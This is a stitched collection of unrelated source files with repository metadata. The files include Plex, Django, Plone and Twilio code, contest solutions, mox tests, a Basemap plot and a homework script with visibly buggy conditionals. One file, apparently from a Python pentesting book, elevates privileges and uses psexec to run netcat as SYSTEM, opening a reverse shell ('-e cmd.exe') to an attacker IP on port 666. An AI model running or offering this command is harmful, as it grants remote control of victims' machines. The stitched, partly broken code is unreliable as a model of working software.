addedAt, guid, index, key, loudnessAnalysisVersion, originallyAvailableAt, parentGuid, parentKey, parentRatingKey, parentThumb, parentTitle, ratingKey, summary, thumb, title, type, updatedAt, year
>>> elements = [c for c in data[0]]
>>> for e in elements:
... e
... e.attrib
... for sub_ele in e:
... sub_ele
... sub_ele.attrib
...
<Element 'Genre' at 0x000001E4E3C929F8>
{'tag': 'K-pop'}
Example playlist syncs::\n
>>> plex.sync_playlist('K-Pop 3+ Stars', userRating__gte=6, genre__like='[kj]-?pop')
2019-06-01 08:53:39 EDT INFO __main__ 178 Creating playlist K-Pop 3+ Stars with 485 tracks
>>> plex.sync_playlist('K-Pop 4+ Stars', userRating__gte=8, genre__like='[kj]-?pop')
2019-06-01 08:54:13 EDT INFO __main__ 178 Creating playlist K-Pop 4+ Stars with 257 tracks
>>> plex.sync_playlist('K-Pop 5 Stars', userRating__gte=10, genre__like='[kj]-?pop')
2019-06-01 08:54:22 EDT INFO __main__ 178 Creating playlist K-Pop 5 Stars with 78 tracks
>>> plex.sync_playlist('K-Pop 5 Stars', userRating__gte=10, genre__like='[kj]-?pop')
2019-06-01 08:54:58 EDT VERBOSE __main__ 196 Playlist K-Pop 5 Stars does not contain any tracks that should be removed
2019-06-01 08:54:58 EDT VERBOSE __main__ 208 Playlist K-Pop 5 Stars is not missing any tracks
2019-06-01 08:54:58 EDT INFO __main__ 212 Playlist K-Pop 5 Stars contains 78 tracks and is already in sync with the given criteria
Object and element attributes and elements available for searching:
- track:
- attributes: addedAt, duration, grandparentGuid, grandparentKey, grandparentRatingKey, grandparentThumb,
grandparentTitle, guid, index, key, originalTitle, parentGuid, parentIndex, parentKey, parentRatingKey,
parentThumb, parentTitle, ratingKey, summary, thumb, title, type, updatedAt
- elements: media
- album:
- attributes: addedAt, guid, index, key, loudnessAnalysisVersion, originallyAvailableAt, parentGuid, parentKey,
parentRatingKey, parentThumb, parentTitle, ratingKey, summary, thumb, title, type, updatedAt, year
- elements: genre
- artist:
- attributes: addedAt, guid, index, key, lastViewedAt, ratingKey, summary, thumb, title, type, updatedAt,
userRating, viewCount
- elements: genre
- media:
- attributes: audioChannels, audioCodec, bitrate, container, duration, id
- elements: part
- genre:
- attributes: tag
- part:
- attributes: container, duration, file, hasThumbnail, id, key, size
:author: Doug Skrypa
"""
from .server import LocalPlexServer
| [
"dskrypa@gmail.com"
] | dskrypa@gmail.com |
# Competitive-programming solution (stdin/stdout).
# For each of N-1 trains (cost c, first departure s, frequency f), l[j]
# accumulates the earliest arrival time at the terminal from stop j.
N=int(input())
l=[0]*N
for i in range(N-1):
    c,s,f=map(int,input().split())
    l[i]=c+s
    for j in range(i):
        # -(-x//f)*f rounds x up to the next multiple of f (ceiling trick).
        l[j]=max(l[j],s,-(-l[j]//f)*f)+c
for i in l:print(i)
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
b201b0ea2d5386b9e8b4dafdfd2fcb3d93cd1298 | b665fe52aceca20944f5c7dfc74688370e514666 | /dbaas/workflow/steps/redis/resize/__init__.py | 5dca9388a256f4780a11cbdaff1ff49171827266 | [] | no_license | tsunli/database-as-a-service | 5e68ee22b1b46d30c6d83278407494971097d451 | 73573d495f62829259f656dfa0b642b9be4f2ead | refs/heads/master | 2021-01-24T15:06:42.029936 | 2015-07-02T21:42:44 | 2015-07-02T21:42:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,626 | py | # -*- coding: utf-8 -*-
import logging
from dbaas_cloudstack.models import HostAttr
from util import exec_remote_command
from workflow.exceptions.error_codes import DBAAS_0015
from util import full_stack
from util import build_context_script
LOG = logging.getLogger(__name__)
def run_vm_script(workflow_dict, context_dict, script):
    """Render ``script`` with the merged context and run it on every instance's VM.

    Returns True when the script succeeded on all instances; on any failure,
    records DBAAS_0015 plus the traceback in workflow_dict['exceptions'] and
    returns False (never raises to the caller).
    """
    try:
        instances_detail = workflow_dict['instances_detail']
        # Python 2 dict merge: per-call context wins over the initial context
        # only for keys set later; HOSTADDRESS/PORT are overwritten per host.
        final_context_dict = dict(context_dict.items() + workflow_dict['initial_context_dict'].items())
        for instance_detail in instances_detail:
            instance = instance_detail['instance']
            host = instance.hostname
            host_csattr = HostAttr.objects.get(host=host)
            final_context_dict['HOSTADDRESS'] = instance.address
            final_context_dict['PORT'] = instance.port
            command = build_context_script(final_context_dict, script)
            output = {}
            # ``output`` is filled in-place by exec_remote_command.
            return_code = exec_remote_command(server = host.address,
                                              username = host_csattr.vm_user,
                                              password = host_csattr.vm_password,
                                              command = command,
                                              output = output)
            # Non-zero return code => remote failure; bail out via the
            # except branch below.
            if return_code:
                raise Exception, "Could not run script. Output: {}".format(output)
        return True
    except Exception:
        traceback = full_stack()
        workflow_dict['exceptions']['error_codes'].append(DBAAS_0015)
        workflow_dict['exceptions']['traceback'].append(traceback)
        return False
| [
"raposo.felippe@gmail.com"
] | raposo.felippe@gmail.com |
d26831364d5626bb2c597b32de481c75ecd14631 | 29a435f155f6b49b97e41241ef01274a15e9b407 | /collective/packagekit/browser/util_view.py | 314997a577dbc4bf2c679f3769306bb1a9686ce2 | [] | no_license | kagesenshi/collective.packagekit | b55d1763bf97e884b89c9eb8f9b51c497f8ad80b | 1fcefc10f1bf71b60dd671dff4783dc390c87e63 | refs/heads/master | 2020-06-03T18:02:22.124810 | 2011-12-29T14:18:44 | 2011-12-29T14:18:44 | 3,011,085 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,146 | py | from five import grok
from collective.packagekit.pkappbehavior import IPackageKitApplicationBehavior
from zope.interface import Interface
from itertools import izip
grok.templatedir('templates')
from zope.security import checkPermission
class PKAppUtilView(grok.View):
    """Helper view for PackageKit application pages (registered as 'pkapp_util')."""
    grok.name('pkapp_util')
    grok.context(IPackageKitApplicationBehavior)

    def render(self):
        return str(self)

    def gridslice(self, items, size=5):
        """Split ``items`` into tuples of ``size``, plus the trailing remainder.

        NOTE(review): when len(items) is an exact multiple of ``size`` the
        trailing element is an empty list — callers appear to tolerate this.
        """
        l = items
        n = size
        # http://taylanpince.com/blog/posts/slicing-a-list-into-equal-groups-in-python/
        return [s for s in izip(*[iter(l)] * n)] + [l[len(l) - (len(l) % n):]]

    def fedora_packages(self):
        # Unique package identifiers limited to the Fedora distribution.
        pkgs = [i['identifier'] for i in self.context.pk_packages if (
            i['distribution'] == 'fedora')]
        return set(pkgs)

    def images(self):
        # Direct Image children of the current context (depth=1).
        return self.context.portal_catalog(
            path={
                'query': '/'.join(self.context.getPhysicalPath()),
                'depth': 1
            },
            portal_type='Image'
        )

    def can_add(self):
        # Whether the current user may add content here.
        return checkPermission('cmf.AddPortalContent', self.context)
| [
"izhar@inigo-tech.com"
] | izhar@inigo-tech.com |
bed7e0c91fb9452819a192221524a55e26a1d1c1 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2189/60795/256420.py | 444dea8a9fbb5a06c9caaf11ecf79c4b1dc786bf | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,327 | py | def test(num):
num = int(num)
at = 0
th, hu, de, fa = 0, 0, 0, 0
if num > 10 & num < 100:
fa = num % 10
de = (num - fa) / 10
at = de * de + fa * fa
elif num > 100 & num < 1000:
hu = num / 100
de = num % 100 / 10
fa = num % 100 % 10
at = hu * hu + de * de + fa * fa
elif num > 1000:
th = num / 1000
hu = num % 1000 / 100
de = num % 1000 % 100 / 10
fa = num % 1000 % 100 % 10
at = th * th + hu * hu + de * de + fa * fa
else:
at = -1
return at
# Driver: for each of T queries, repeatedly grows ``num`` and checks whether
# iterating the digit-square-sum map (``test``) hits a power of ten within
# 10 steps, printing each qualifying value.
# NOTE(review): reproduced verbatim — ``p`` is never reset to False except on
# a -1 sentinel, and the loop variable ``i`` is reused by the inner probe
# loop, so termination depends entirely on ``test`` returning -1.
T=int(input())
for i in range(0,T):
    borad=input()
    num=int(input())
    p=True
    number=0
    while p:
        num=number+num
        sum = test(num)
        ttt = 0
        if sum == -1:
            p=False
        else:
            # Probe at most 10 iterations of the digit-square-sum map.
            for i in range(0, 10):
                sum = test(sum)
                sum = int(sum)
                if sum == 100:
                    ttt = 1
                    break
                elif sum == 1:
                    ttt = 1
                    break
                elif sum == 10:
                    ttt = 1
                    break
                elif sum == 1000:
                    ttt = 1
                    break
            if ttt == 1:
                p=True
                print(num)
            number=number+1
"1069583789@qq.com"
] | 1069583789@qq.com |
1c5fedb67468760e5c3073345d8d2eb82b9228ea | 050ccac41c3b3b217204eb5871ca987f897b8d56 | /tradeorsale/apps/item/events.py | 0cef9d23f7d18247f34355e0ff52e24a94de8e5d | [] | no_license | marconi/tradeorsale | 6aefc7760f389aabd7e08fe40953914f5ea60abc | 6750260734f77cbf60c19ddddc83ebd27a5fb3a9 | refs/heads/master | 2021-01-23T20:21:24.210074 | 2013-01-12T09:05:09 | 2013-01-12T09:05:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,524 | py | # # -*- coding: utf-8 -*-
# import logging
# from cornice import Service
# from sqlalchemy.orm.exc import NoResultFound
# from pyramid.i18n import TranslationString as _
# from tradeorsale.apps.item.models import Item
# from tradeorsale.libs.models import DBSession
# logger = logging.getLogger('tradeorsale')
# json_header = {'Content-Type': 'application/json'}
# event_service = Service(name='item_events', path='/items/events')
# VALID_ACTIONS = ('comment.created',)
# def validate_action(request):
# action = request.POST.get('action', None)
# if not action or action not in VALID_ACTIONS:
# request.errors.add('body', 'action', _(u'Invalid action'))
# def validate_item(request):
# try:
# item_id = int(request.POST.get('item_id', 0))
# try:
# DBSession.query(Item).filter_by(id=item_id).one()
# except NoResultFound:
# request.errors.add('body', 'item_id', _(u"Item doesn't exist"))
# except ValueError:
# request.errors.add('body', 'item_id', _(u'Invalid Item ID'))
# @event_service.post(validators=(validate_action, validate_item))
# def item_event_post(request):
# item_id = request.POST['item_id']
# action = request.POST['action']
# redis = request.registry.redis
# if action == 'comment.created':
# if not redis.hget('comments:counter', item_id):
# redis.hset('comments:counter', item_id, 1)
# else:
# redis.hincrby('comments:counter', item_id)
# return True
| [
"caketoad@gmail.com"
] | caketoad@gmail.com |
69825a5a9bffc35dd9540519400ec2f710db6246 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5670465267826688_1/Python/cvarad/abc.py | 1720f7c8ffacfd6974b6e997e64ca36d68e8cbc7 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 2,505 | py | mult = {('j', '1'): 'j', ('k', 'i'): 'j', ('1', 'j'): 'j', ('1', '1'): '1', ('k', 'j'): '-i', ('1', 'k'): 'k', ('k', 'k'): '-1', ('j', 'i'): '-k', ('k', '1'): 'k', ('i', 'j'): 'k', ('1', 'i'): 'i', ('i', 'k'): '-j', ('j', 'k'): 'i', ('i', 'i'): '-1', ('i', '1'): 'i', ('j', 'j'): '-1'}
def multiply(x, y):
    """Multiply two signed quaternion units ('1', 'i', 'j', 'k', optionally
    prefixed with '-') and return the signed product string.

    Same contract as before; the Hamilton product table is kept local so the
    function is self-contained instead of reading the module-level ``mult``.
    """
    table = {
        ('1', '1'): '1', ('1', 'i'): 'i', ('1', 'j'): 'j', ('1', 'k'): 'k',
        ('i', '1'): 'i', ('i', 'i'): '-1', ('i', 'j'): 'k', ('i', 'k'): '-j',
        ('j', '1'): 'j', ('j', 'i'): '-k', ('j', 'j'): '-1', ('j', 'k'): 'i',
        ('k', '1'): 'k', ('k', 'i'): 'j', ('k', 'j'): '-i', ('k', 'k'): '-1',
    }

    def flip(unit):
        # Toggle the '-' prefix of a table entry.
        return unit[1:] if unit.startswith('-') else '-' + unit

    x_neg = x.startswith('-')
    y_neg = y.startswith('-')
    product = table[(x[1:] if x_neg else x, y[1:] if y_neg else y)]
    # Exactly one negative operand flips the sign; two negatives cancel.
    return flip(product) if x_neg != y_neg else product
if __name__ == '__main__':
    # Google Code Jam style driver (Python 2): for each case, a string s
    # repeated x times must factor as (prefix ~ i)(middle ~ j)(suffix ~ k)
    # under quaternion multiplication.
    t = input()
    for i in range(1, t+1):
        l, x = map(int, raw_input().split())
        s = raw_input()
        # Fewer than 3 characters total, or a single repeated character,
        # can never split into i * j * k.
        if l*x < 3 or len(set(s)) == 1:
            print "Case #" + str(i) + ": NO"
            continue
        if x <= 4:
            # Small repetition count: materialize the full string and scan.
            s = s*x
            found = 0
            first = '1'
            index = 0
            # Find the shortest prefix whose product is i.
            for a in range(0, len(s)-2):
                first = multiply(first, s[a])
                if first == 'i':
                    found = 1
                    index = a
                    break
            if found == 0:
                print "Case #" + str(i) + ": NO"
                continue
            found = 0
            first = '1'
            # Then a following segment whose product is j.
            for b in range(index+1, len(s)-1):
                first = multiply(first, s[b])
                if first == 'j':
                    found = 1
                    index = b
                    break
            if found == 0:
                print "Case #" + str(i) + ": NO"
                continue
            first = '1'
            # The remainder must multiply out to k.
            for c in range(index+1, len(s)):
                first = multiply(first, s[c])
            if first == 'k':
                print "Case #" + str(i) + ": YES"
            else:
                print "Case #" + str(i) + ": NO"
        else:
            # Large x: the product of s with itself has period at most 4, so
            # scanning 4 copies per phase suffices.
            copy_s = s
            s = copy_s*4
            x -= 4
            found = 0
            first = '1'
            index = 0
            for a in range(0, len(s)):
                first = multiply(first, s[a])
                if first == 'i':
                    found = 1
                    index = a
                    break
            if found == 0:
                print "Case #" + str(i) + ": NO"
                continue
            # Refill the working window after consuming the i-prefix.
            if x >= 4:
                s = s[index+1:] + copy_s*4
                x -= 4
            else:
                s = s[index+1:] + copy_s*x
                x = 0
            found = 0
            first = '1'
            for b in range(0, len(copy_s)*4):
                first = multiply(first, s[b])
                if first == 'j':
                    found = 1
                    index = b
                    break
            if found == 0:
                print "Case #" + str(i) + ": NO"
                continue
            # Whatever remains (plus leftover repetitions mod 4) must be k.
            s = s[index+1:] + copy_s*(x%4)
            first = '1'
            for c in range(0, len(s)):
                first = multiply(first, s[c])
            if first == 'k':
                print "Case #" + str(i) + ": YES"
            else:
                print "Case #" + str(i) + ": NO"
"eewestman@gmail.com"
] | eewestman@gmail.com |
1bea2d0ad3996f39218a58d6b1b0ab794fe1b9d9 | c00f701c7d4f765b1be9c0a1d68861551b063185 | /pages/admin.py | 9fd844fc98e431223bb9e097241c2404a0b613f6 | [] | no_license | Aditta-das/vege | f52921de10e492b775defc0f698cc784e011f1a9 | 881d99de1ae44787d504b1bb3647c873b7e7a32f | refs/heads/master | 2020-12-23T19:50:18.570462 | 2020-01-30T17:11:07 | 2020-01-30T17:11:07 | 237,255,549 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 305 | py | from django.contrib import admin
from .models import Detail, Comment
# Register your models here.
class Admin(admin.ModelAdmin):
    """Change-list configuration for the Detail model."""
    # Columns shown on the change list.
    list_display = ('id', 'title', 'category', 'is_stock', 'price')
    # Columns that link to the edit page.
    list_display_links = ('id', 'title')

admin.site.register(Detail, Admin)
admin.site.register(Comment)
| [
"ndas5662@gmail.com"
] | ndas5662@gmail.com |
dccf38d64ab43cb8022c1097d9c82acdc491b23a | b09920ecdce8ab84df6a3b24b420d14c2c846078 | /GrantHolders/migrations/0002_auto_20201226_1723.py | fb6fab5051eec95566994b38a46b86eaa5c75baa | [] | no_license | BakdauletBolatE/sciense2020 | becdf64a3ecdfd35651b34cc045e09ee6ca804b9 | 4ed24162c056fc95bf8c02800116eddaf48c6387 | refs/heads/main | 2023-02-11T15:13:52.307403 | 2021-01-02T12:46:05 | 2021-01-02T12:46:05 | 324,537,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 787 | py | # Generated by Django 3.1.4 on 2020-12-26 17:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated migration: adjusts the ``poster`` image field and the
    # ``subject`` foreign key on the GrantHolders model.

    dependencies = [
        ('GrantHolders', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='grantholders',
            name='poster',
            field=models.ImageField(upload_to='graduate_img/', verbose_name='Грант иегерінің суреті'),
        ),
        migrations.AlterField(
            model_name='grantholders',
            name='subject',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='GrantHolders.subject', verbose_name='Грант иегерінің пәні'),
        ),
    ]
| [
"bakosh21345@gmail.com"
] | bakosh21345@gmail.com |
657e83359651d28d59d3c8c43f3f9ecfd7ae5c7a | b45d66c2c009d74b4925f07d0d9e779c99ffbf28 | /tests/unit_tests/core_tests/service_tests/main_tests/test_main_retail_input_endpoints.py | 5b43f5ae98c9a1212f70f561e05c1f1ea8ed82b7 | [] | no_license | erezrubinstein/aa | d96c0e39762fe7aaeeadebbd51c80b5e58576565 | a3f59ba59519183257ed9a731e8a1516a4c54b48 | refs/heads/master | 2021-03-12T23:44:56.319721 | 2016-09-18T23:01:17 | 2016-09-18T23:01:17 | 22,665,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,352 | py | from core.service.svc_main.implementation.service_endpoints.retail_input_endpoints import RetailInputEndpoints
from core.service.svc_main.implementation.service_endpoints.endpoint_field_data import *
from common.helpers.common_dependency_helper import register_common_mox_dependencies
from common.utilities.inversion_of_control import dependencies, Dependency
import json
import mox
__author__ = 'vgold'
class RetailInputEndpointsTests(mox.MoxTestBase):
    """Mox-based unit tests for RetailInputEndpoints.

    Each test stubs the endpoint's collaborators on a mocked instance and
    calls the method unbound, passing the mock as ``self``.
    NOTE(review): this is Python-2-era code -- ``async=True`` below is a
    syntax error on Python 3.7+, where ``async`` is a reserved keyword.
    """
    def setUp(self):
        """Build a fully-mocked RetailInputEndpoints and a caller context."""
        # call parent set up
        super(RetailInputEndpointsTests, self).setUp()
        # register mock dependencies
        register_common_mox_dependencies(self.mox)
        # get several dependencies that we'll need in the class
        self.mock_main_access = Dependency("CoreAPIProvider").value
        # Set mock attributes on WorkflowService instance for calls to record
        self.mock = self.mox.CreateMock(RetailInputEndpoints)
        self.mock.main_access = self.mox.CreateMockAnything()
        self.mock.main_access.wfs = self.mox.CreateMockAnything()
        self.mock.main_access.mds = self.mox.CreateMockAnything()
        self.mock.main_param = self.mox.CreateMockAnything()
        self.mock.em_access = self.mox.CreateMockAnything()
        self.mock.excel_helper = self.mox.CreateMockAnything()
        self.mock.cache_rec_options = {"has_metadata": True}
        self.mock.store_helper = self.mox.CreateMockAnything()
        self.mock.rir_helper = self.mox.CreateMockAnything()
        self.mock.address_helper = self.mox.CreateMockAnything()
        self.mock.WorkflowTaskGroup = self.mox.CreateMockAnything()
        self.mock.CompanyInfo = self.mox.CreateMockAnything()
        self.mock.SingleRirAdder = self.mox.CreateMockAnything()
        self.mock.QCTaskCreator = self.mox.CreateMockAnything()
        self.mock.RetailInputFileUploader = self.mox.CreateMockAnything()
        self.mock.WorkflowNextTaskGetter = self.mox.CreateMockAnything()
        # Set mock attributes on WorkflowService instance for calls to ignore
        self.mock.cfg = Dependency("MoxConfig").value
        self.mock.logger = Dependency("FlaskLogger").value
        # Create caller context
        self.context = {"user_id": 1, "source": "test_main_retail_input_endpoints.py",
                        "user": {"user_id": 1, "is_generalist": False},
                        "team_industries": ["asdf"]}
    def doCleanups(self):
        """Clear the IoC dependency registry after each test."""
        super(RetailInputEndpointsTests, self).doCleanups()
        dependencies.clear()
    ##########################################################################
    # RetailInputEndpoints.get_preset_retail_input_summary_collections()
    def test_get_preset_retail_input_summary_collections(self):
        """Paging/sort params and field filters are built, then wfs is queried."""
        request = self.mox.CreateMockAnything()
        params = {"helo": "moto"}
        request.args = {"params": json.dumps(params), "context": json.dumps(self.context)}
        paging_params = {"paging_params": "paging_params"}
        self.mock._format_page_and_sort_params(params, field_list = RETAIL_INPUT_SUMMARY_TASK_GROUP_DB_FIELDS).AndReturn(paging_params)
        query = {"query": "query"}
        self.mock._format_query_from_field_filters(RETAIL_INPUT_SUMMARY_TASK_GROUP_SEARCHABLE_DB_FIELDS,
                                                   RETAIL_INPUT_SUMMARY_TASK_GROUP_SEARCHABLE_DB_FIELDS,
                                                   params).AndReturn(query)
        params = dict(paging_params, query = query, fields = RETAIL_INPUT_SUMMARY_TASK_GROUP_DB_FIELDS)
        data = "data"
        self.mock.main_access.wfs.call_task_group_data(self.context, params).AndReturn(data)
        self.mox.ReplayAll()
        results = RetailInputEndpoints.get_preset_retail_input_summary_collections(self.mock, request)
        self.assertEqual(results, data)
    ##########################################################################
    # RetailInputEndpoints.post_retail_input_add_one_record()
    def test_post_retail_input_add_one_record(self):
        """The endpoint delegates to SingleRirAdder(...).run()."""
        data = "data"
        files = "files"
        single_rir_adder = self.mox.CreateMockAnything()
        # NOTE(review): `async` is a reserved keyword from Python 3.7 onward.
        self.mock.SingleRirAdder(data, files, self.context, async=True).AndReturn(single_rir_adder)
        single_rir_adder.run().AndReturn("a")
        self.mox.ReplayAll()
        results = RetailInputEndpoints.post_retail_input_add_one_record(self.mock, data, files, self.context, True)
        self.assertEqual('a', results)
    ##########################################################################
    # RetailInputEndpoints.post_retail_input_record_validation_create_qc()
    def test_post_retail_input_record_validation_create_qc(self):
        """The endpoint delegates to QCTaskCreator(...).run()."""
        data = "data"
        qc_task_creator = self.mox.CreateMockAnything()
        self.mock.QCTaskCreator(data, self.context).AndReturn(qc_task_creator)
        qc_task_creator.run().AndReturn("a")
        self.mox.ReplayAll()
        results = RetailInputEndpoints.post_retail_input_record_validation_create_qc(self.mock, data, self.context)
        self.assertEqual('a', results)
    ##########################################################################
    # RetailInputEndpoints.post_retail_input_file_upload()
    def test_post_retail_input_file_upload(self):
        """The endpoint delegates to RetailInputFileUploader(...).run()."""
        data = "data"
        files = "files"
        rif_uploader = self.mox.CreateMockAnything()
        self.mock.RetailInputFileUploader(data, files, self.context).AndReturn(rif_uploader)
        rif_uploader.run().AndReturn("a")
        self.mox.ReplayAll()
        results = RetailInputEndpoints.post_retail_input_file_upload(self.mock, data, files, self.context)
        self.assertEqual('a', results)
    ##########################################################################
    # RetailInputEndpoints.get_preset_retail_input_record_validation_next_target()
    def test_get_preset_retail_input_record_validation_next_target(self):
        """The endpoint delegates to WorkflowNextTaskGetter(...).run()."""
        query = "query"
        workflow_next_task_getter = self.mox.CreateMockAnything()
        self.mock.WorkflowNextTaskGetter(query, self.context).AndReturn(workflow_next_task_getter)
        workflow_next_task_getter.run().AndReturn("a")
        self.mox.ReplayAll()
        results = RetailInputEndpoints.get_preset_retail_input_record_validation_next_target(self.mock, query, self.context)
        self.assertEqual('a', results)
| [
"erezrubinstein@hotmail.com"
] | erezrubinstein@hotmail.com |
7ec822625c92375e8d896e391d9e29f135d560bf | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_135/1016.py | ddf1fa1b653fea35088b6d3fe64db5a02aa39fff | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 622 | py | # -*- coding: utf-8 -*-
# Google Code Jam "Magic Trick" solver (Python 2: print statements).
# Input: T cases; each case is a chosen row number followed by a 4x4 grid,
# twice.  The card is the intersection of the two chosen rows.
f = open("A-small-attempt0.in")
T = int(f.readline())
for t in range(T):
    # First arrangement: remember the set of cards in the chosen row.
    a = int(f.readline())
    for i in range(1, 5):
        s = f.readline()
        if i == a:
            firstset = set(map(int, s.split(" ")))
    # Second arrangement: same for the second chosen row.
    b = int(f.readline())
    for i in range(1, 5):
        s = f.readline()
        if i == b:
            secondset = set(map(int, s.split(" ")))
    # Cards present in both chosen rows.
    dup = firstset & secondset
    print "Case #%d:" %(t+1),
    if len(dup) == 0:
        # No common card: the volunteer's answers were inconsistent.
        print "Volunteer cheated!"
    elif len(dup) == 1:
        # Exactly one candidate: that is the chosen card.
        print dup.pop()
    else:
        # Several candidates: the trick cannot determine the card.
        print "Bad magician!"
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
94acf1ea1faefa3016f2d23ef45c62315e312dda | dbf76237e39087bf1a73243bbb019710182be0e4 | /Capitulo 2/28 - autoridade2.py | 0446ac6eb10b20550fa18cfc8fd429680b9e8601 | [] | no_license | sandromelobrazil/Python_Para_Pentest | 52edd86fa5929e0303e60e9872c027aae564becd | 1837b523ad55e1c8ca066341459714e2fc88f037 | refs/heads/master | 2020-04-05T16:56:22.342925 | 2018-11-11T00:52:23 | 2018-11-11T00:52:23 | 157,035,879 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 191 | py | import ctypes
# Book exercise (privilege-escalation chapter): ShellExecuteW with the
# "runas" verb launches Sysinternals psexec, which starts nc.exe as SYSTEM
# (-s, detached -d) connecting back to the attacker's IP on port 666.
# NOTE(review): educational sample from the book -- run only in an
# authorized lab environment.
ctypes.windll.shell32.ShellExecuteW(None, u"runas", u"psexec.exe",
u"-accepteula -nobanner -s -d C:\\Users\\usuario\\Desktop\\nc.exe IP_do_atacante 666 -e cmd.exe", None, 0)
"sandromelo.brazil@gmail.com"
] | sandromelo.brazil@gmail.com |
2e24114040a5492d2a20aa1dd70e6205c6b0a72d | 806bf6a28854da12df7fad1deefa175f4e974ad6 | /visualization/c2.2.25.py | 6d7b77a2406ca6f0844169ce7bb3968c0b62250e | [] | no_license | qliu0/PythonInAirSeaScience | ba613e61ce331e5e2b4b5c0045f0223cde42718b | 1c8d5fbf3676dc81e9f143e93ee2564359519b11 | refs/heads/master | 2023-08-28T08:24:15.894918 | 2021-08-26T12:26:58 | 2021-08-26T12:26:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 772 | py | from mpl_toolkits.basemap import Basemap
import numpy as np
import matplotlib.pyplot as plt
# lat_1 and lat_2 are the first and second standard parallels.
m = Basemap(width=12000000,height=9000000,\
            resolution='l',projection='eqdc',\
            lat_1=45.,lat_2=55,lat_0=50,lon_0=108.)
# Draw the base map: coastlines, filled land, graticule, background.
m.drawcoastlines()
m.fillcontinents(color='y',lake_color='c')
m.drawparallels(np.arange(-80.,81.,20.))
m.drawmeridians(np.arange(0.,361.,20.))
m.drawmapboundary(fill_color='c')
ax = plt.gca()
# Place a 9x12 grid of Tissot indicatrices to visualise the projection's
# local distortion (circles of 2 degrees radius, 100 segments each).
for y in np.linspace(m.ymax/20,19*m.ymax/20,9):
    for x in np.linspace(m.xmax/20,19*m.xmax/20,12):
        # Convert map coordinates back to lon/lat for tissot().
        lon, lat = m(x,y,inverse=True)
        poly = m.tissot(lon,lat,2.,100,\
                        facecolor='red',zorder=10,alpha=0.5)
plt.title("Equidistant Conic Projection")
plt.show()
| [
"queensbarry@foxmail.com"
] | queensbarry@foxmail.com |
afb3a5e9967dbe9b0e8519795602b3cb86d2e631 | 39fa2df1ab72444f3fe62d29c2dd146fbcdff564 | /test1/MyDjangoSite/myTest/views.py | 1b8c643053f6869de091845b2306c03bae1a14f1 | [] | no_license | gaozhidf/django | faa6c3f623075efc9c30f039ae93c8d02decb085 | 8526c2b33cc41dee9a636d126366990fb502834b | refs/heads/master | 2021-01-01T17:15:52.834568 | 2015-08-13T09:26:26 | 2015-08-13T09:26:26 | 40,441,228 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse, Http404
def hello(request):
    """Trivial Django view: answer every request with plain 'Hello world'."""
    return HttpResponse("Hello world")
def hello1(request, num):
    """Parse *num* as an integer; raise Http404 when it is not one.

    NOTE(review): the HttpResponse built below is never returned, so this
    view yields None on success -- confirm whether a `return` is missing.
    """
    try:
        num = int(num)
        HttpResponse("Hello world too")
    except ValueError:
raise Http404() | [
"gaozhidf@gmail.com"
] | gaozhidf@gmail.com |
e0b92735daaf2063e1e568e4174e38dfd2c19568 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Projects/twilio/build/lib/twilio/rest/api/v2010/account/conference/participant.py | b7979a9d6f17baa5d7fd2d1d56c1a25272656037 | [
"LicenseRef-scancode-other-permissive"
] | permissive | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:517e39235cd9a18aa43315a0f2243a0b6f051535285cb71b5db98d5aec53da01
size 30162
| [
"nateweiler84@gmail.com"
] | nateweiler84@gmail.com |
